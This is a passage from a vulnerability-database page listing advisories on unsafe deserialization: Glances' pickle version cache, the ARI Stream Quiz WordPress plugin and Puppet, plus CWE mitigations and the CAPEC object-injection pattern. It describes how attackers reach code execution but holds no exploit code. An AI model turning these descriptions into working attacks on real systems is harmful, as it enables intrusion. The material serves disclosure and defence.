the Glances user\u0027s XDG cache directory, or in any containerised deployment using shared volumes.\n\n**Impact:**\n- **Confidentiality:** Full \u2014 the attacker gains code execution in the context of the Glances process and can read any data accessible to that user.\n- **Integrity:** Full \u2014 arbitrary commands can modify files, install persistence mechanisms, or alter system state.\n- **Availability:** Full \u2014 the Glances process and, if running as root, the system can be disrupted.\n\nOn many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.\n\n---\n\n### Suggested Fix\n\nReplace `pickle` with `json` for the version cache.  The data stored is a simple Python dictionary containing two string values and a `datetime` object; a JSON representation is straightforward:\n\n```python\nimport json\nfrom datetime import datetime\n\n# Saving\nwith open(self.cache_file, \u0027w\u0027, encoding=\u0027utf-8\u0027) as f:\n    json.dump({\n        \u0027installed_version\u0027: self.installed_version(),\n        \u0027latest_version\u0027:    latest,\n        \u0027refresh_date\u0027:      datetime.now().isoformat(),\n    }, f)\n\n# Loading\nwith open(self.cache_file, \u0027r\u0027, encoding=\u0027utf-8\u0027) as f:\n    cached_data = json.load(f)\n    cached_data[\u0027refresh_date\u0027] = datetime.fromisoformat(cached_data[\u0027refresh_date\u0027])\n```\n\nIf pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).\n\nAs an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
  "id": "GHSA-9837-48hr-q32j",
  "modified": "2026-06-22T21:21:07Z",
  "published": "2026-06-22T21:21:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nicolargo/glances"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Glances has Insecure Pickle Deserialization in its Version Cache that Leads to Arbitrary Code Execution"
}

GHSA-983R-78QH-9FRX

Vulnerability from github – Published: 2023-12-31 12:30 – Updated: 2026-04-28 21:33
VLAI
Details

Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz – WordPress Quizzes Builder.This issue affects ARI Stream Quiz – WordPress Quizzes Builder: from n/a through 1.3.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-52182"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-31T10:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz \u2013 WordPress Quizzes Builder.This issue affects ARI Stream Quiz \u2013 WordPress Quizzes Builder: from n/a through 1.3.0.",
  "id": "GHSA-983r-78qh-9frx",
  "modified": "2026-04-28T21:33:40Z",
  "published": "2023-12-31T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52182"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/ari-stream-quiz/wordpress-ari-stream-quiz-plugin-1-3-0-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-988W-9QQW-43HR

Vulnerability from github – Published: 2022-05-14 03:21 – Updated: 2022-05-14 03:21
VLAI
Details

Versions of Puppet prior to 4.10.1 will deserialize data off the wire (from the agent to the server, in this case) with a attacker-specified format. This could be used to force YAML deserialization in an unsafe manner, which would lead to remote code execution. This change constrains the format of data on the wire to PSON or safely decoded YAML.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-2295"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-05T15:29:00Z",
    "severity": "HIGH"
  },
  "details": "Versions of Puppet prior to 4.10.1 will deserialize data off the wire (from the agent to the server, in this case) with a attacker-specified format. This could be used to force YAML deserialization in an unsafe manner, which would lead to remote code execution. This change constrains the format of data on the wire to PSON or safely decoded YAML.",
  "id": "GHSA-988w-9qqw-43hr",
  "modified": "2022-05-14T03:21:36Z",
  "published": "2022-05-14T03:21:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2295"
    },
    {
      "type": "WEB",
      "url": "https://puppet.com/security/cve/cve-2017-2295"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2017/dsa-3862"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/98582"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.